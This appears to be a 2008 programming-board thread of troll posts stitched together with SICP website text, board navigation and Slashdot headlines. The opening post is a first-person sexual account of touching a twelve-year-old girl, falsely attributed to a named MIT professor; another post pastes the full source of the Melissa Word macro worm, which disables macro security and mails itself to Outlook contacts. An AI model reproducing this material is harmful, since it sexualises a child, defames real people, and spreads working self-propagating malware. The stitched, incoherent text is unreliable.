Gerry Sussman here,
I just spent the last twenty minutes rubbing a twelve year old girl's bare chest.
"How?" you ask. Well apparently there are a select few contexts within which such an action is acceptable. For instance, if your niece has a hacking cough and your sister asks you to "put some of this on her" while she calls the doctor.
"Putting some of this on hear" meant using my bare hands to rub this vapor ointment shit all over her BARE NAKED CHEST. My heartbeat is still all erratic from it. I had a boner the size of manhattan the entire time. She's sleeping now and I guess she feels better because she stopped coughing.
Details: She's about 5 feet tall, has long brown hair, a cute face, a thin waist and long skinny legs. She's in jammies I think because although I'm pretty shaken up right now I know I unbuttoned something before I went at it.
God I feel so great. I just rubbed my hands lal over her FUCKING TITS, you guys. Well the puffy parts of her chest anyway. Her nipples got hard. I just about wept tears of joy.
I didn't do anything else because I'm a coward and rubbing was enough. Plus it was legal and I didn't technically do anything wrong, so I'm in the clear.
I'd write more but I seriously have to go fap while the memory is fresh in my head.
And then Hal Abelson walked into the room and tugged on my foreskin.
(print "the end")
(desu (desu (desu (desu ))))
Name:
Anonymous2008-09-15 3:18
Ableson tuggs on everyone's foreskin.
Name:
Anonymous2008-09-15 3:20
because of the wizard on the jacket. One of the bibles of the LISP/Scheme world. Also, less commonly, known as the Purple Book.
from The New Hacker's Dictionary, 2nd edition
(MIT Press, 1993)
This site is a companion to the influential computer-science text Structure and Interpretation of Computer Programs, by Abelson, Sussman, and Sussman. Its purpose is to demonstrate the Web's potential to be a channel for innovative support for textbook users.
The material on this site is aimed at instructors using SICP as a course text, and at people using the book for self-study.
Currently at this site you will find:
Full text!
The complete text in HTML.
This work is licensed under a Creative Commons Attribution-Noncommercial 3.0 Unported License.
Sample programming assignments
This is a collection of assignments, developed for the course at MIT, which instructors can download and modify. Each assignment contains an extensive write-up and all necessary source code.
Code from the book
These files contain all source code from the book, in a form suitable for loading and running.
Instructor's Manual
Contains discussions of exercises and other material in the text as well as supplementary material, additional examples and exercises, and teaching suggestions. An appendix summarizes the Scheme programming language as used in the text, showing at what point in the text each element of Scheme is introduced.
Errata last posted 08/09/99
How to get Scheme
SICP uses the Scheme dialect of Lisp. Scheme implementations are available for most common platforms. From MIT, we supply free implementations of the MIT Scheme programming environment. This page provides information on how to obtain copies of MIT Scheme as well as other implementations.
A note on our course at MIT
This note describes the organization of our course as MIT, as well as an overview of the educational approach underlying the course and SICP. There is also a sample syllabus for the course.
Schools using SICP
A partial and growing list of universities and colleges that are using SICP for either an introductory or an advanced course.
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub
The 5 newest replies are shown below.
Read this thread from the beginning
15 Name: Anonymous : 2008-09-14 14:31
FRANZ LISP
16 Name: SNOW CRASH MEME FAN : 2008-09-14 15:39
SNOW CRASH
17 Name: Anonymous : 2008-09-14 15:45
HAX MY COMMON LISP REFERENCE IMPLEMENTATION
18 Name: Anonymous : 2008-09-14 16:16
LITHP
19 Name: Anonymous : 2008-09-14 20:20
From - Mon Sep 15 01:17:42 2008
Return-Path: <elleusu@kiwi.no>;;
Date: Mon, 15 Sep 2008 08:56:30 +0900
From: Vinh <elleusu@kiwi.no>;;
User-Agent: Thunderbird 2.0.0.16 (Windows/20080708)
To: gjs@mit.edu
Subject: Convert your snake into a mighty python
Who sent me this >:(
Name:
Anonymous2008-09-15 3:25
[2:40] /prog/'s x86 assembly program
1 Name: Anonymous : 2008-09-12 23:13
One post, one instruction.
xor eax, eax
The 5 newest replies are shown below.
Read this thread from the beginning
36 Name: Anonymous : 2008-09-14 17:55
┌┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┐
┤This is a patented IBM/390 mainframe ├
┤ 31-bit millichip! ├
┤ Don't copy that floppy. ├
┤ Disobedience will be punished ├
└┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┘
37 Name: Anonymous : 2008-09-15 01:22
>>36
┌┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┐
┤This is a patented IBM/390 mainframe ├
┤ 31-bit millichip! ├
┤ Don't copy that floppy. ├
┤ Disobedience will be punished ├
└┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┘
38 Name: Anonymous : 2008-09-15 02:02
┌┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┐┌┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┐
┤This is a patented IBM/390 mainframe ├┤This is a patented IBM/390 mainframe ├
┤ 31-bit millichip! ├┤ 31-bit millichip! ├
┤ Don't copy that floppy. ├┤ Don't copy that floppy. ├
┤ Disobedience will be punished ├┤ Disobedience will be punished ├
└┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┘└┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┘
39 Name: Anonymous : 2008-09-15 02:21
[2:40] /prog/'s x86 assembly program
1 Name: Anonymous : 2008-09-12 23:13
One post, one instruction.
xor eax, eax
The 5 newest replies are shown below.
Read this thread from the beginning
36 Name: Anonymous : 2008-09-14 17:55
┌┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┐
┤This is a patented IBM/390 mainframe ├
Name:
Anonymous2008-09-15 3:26
That was VIP quality!
I am the 1000 of my GET.
VIP is my body, and kopipe is my blood.
I have created over 999 posts.
Unaware of /b/.
Nor aware of fchan.
Withstood bans to create many flamewars.
Waiting for one's arrival.
I have no regrets, this was the only path.
My whole life was Unlimited Troll Works.
Click here to be forwarded manually
Powered by Shiichan 3955 + 4chan 20080608.
create an account to participate in the Slashdot moderation system
Your Rights Online: 10 Years of Translated Bin Laden Messages Leaked
Posted by kdawson on Monday September 15, @02:27AM
from the portraits-in-extremism dept.
DragonFire1024 lets us know that Wikileaks has obtained 10 years of messages and interviews by Osama bin Laden, the leader of al-Qaeda. The documents were translated and the messages and interviews were authenticated by the US CIA.
"The nearly three hundred page, 'official use only' packet from 2004, translated by the Foreign Broadcast Information Service, a division of the CIA, includes interviews with bin Laden from various news agencies and also includes messages he sent directly to the US from the periods of 1994 to 2004. One message includes bin Laden's denial of having anything to do with the September 11, 2001 attacks in New York City, Washington DC, and Pennsylvania."
[+] censorship (tagging beta)
Read More... 45 comments | yro.slashdot.org
Technology: Microsoft Says IE8 Phoning Home Is "Pretty Innocuous"
Posted by kdawson on Sunday September 14, @11:53PM
from the unlike-that-other-browser dept.
CWmike writes
"Microsoft has defended the IE8 tool that suggests sites based on URLs typed into its address bar, saying that the browser 'phones home' only a limited amount of information to Microsoft and that the company discards all user IP addresses almost immediately. Company managers also contrasted IE8 Beta 2's 'Suggested Sites' feature with the 'Suggest' feature used by Google Chrome, saying that Microsoft's requires the user's explicit permission before it's used. They did acknowledge a bug that prevents the request from reappearing when users reinstall the browser. Cyra Richardson, a Microsoft principal program manager on the IE team, said: 'Suggested Sites is connected to the browser's history, and it's not looking at each of the keystrokes. IE only captures the URL as it is navigated [to], when that URL goes into your history.' Nor does Suggested Sites log and transmit cookies to Microsoft's servers, as does Google Suggest, Richardson said. 'The data we log is actually pretty innocuous.'"
[+] microsoft, msie, privacy (tagging beta)
Read More... 81 comments | tech.slashdot.org
Hardware: 3M Launches First Pocket Projector
Posted by kdawson on Sunday September 14, @09:31PM
from the gadget-holy-grail dept.
An anonymous reader writes
"Popsci.com has a writeup on 3M's new pocket projector, the 3M MPro 110, set to launch on September 30. 'In a dark room, it could project a big enough image to be the ultimate cheap-o home theater. The projector will sell for a mere $359. It doesn't have a speaker, so you'll have to get that separately. But really, how good could a microscopic speaker jammed into this thing sound, anyway?'"
[+] displays, toy (tagging beta)
Read More... 109 comments | hardware.slashdot.org
Ask Slashdot: Successful Moonlighting For Geeks?
Posted by kdawson on Sunday September 14, @07:33PM
from the oh-and-it's-gotta-be-legal dept.
Lawksamussy writes
"Having just bought a really old house that's on the verge of falling down, I'm now trying to find a way to pay to fix it up. I have a great job in software development that pays the bills, but I'm looking to earn some extra cash in my spare time. Whatever I end up doing has to be reasonably lucrative (or at least have the potential to be so), not require any specific time commitment, and be doable equally well from home or from a hotel room. I'm also keen that it should be sufficiently different to my day job to keep my interest up, so the most obvious things like bidding for programming projects on Rentacoder.com, or fixing up neighbors' PCs, aren't really on. Above all, it should appeal to my inner geek, otherwise my low boredom threshold will doom it to failure before I even start! So, I wonder if any of my fellow Slashdotters run little part-time ventures that they find more of an inspiration than a chore... and if they are willing to share what they do and perhaps even how much money they make doing it?"
[+] business, idalsolikeapony, prostitution, goodluckwiththat (tagging beta)
Read More... 279 comments | ask.slashdot.org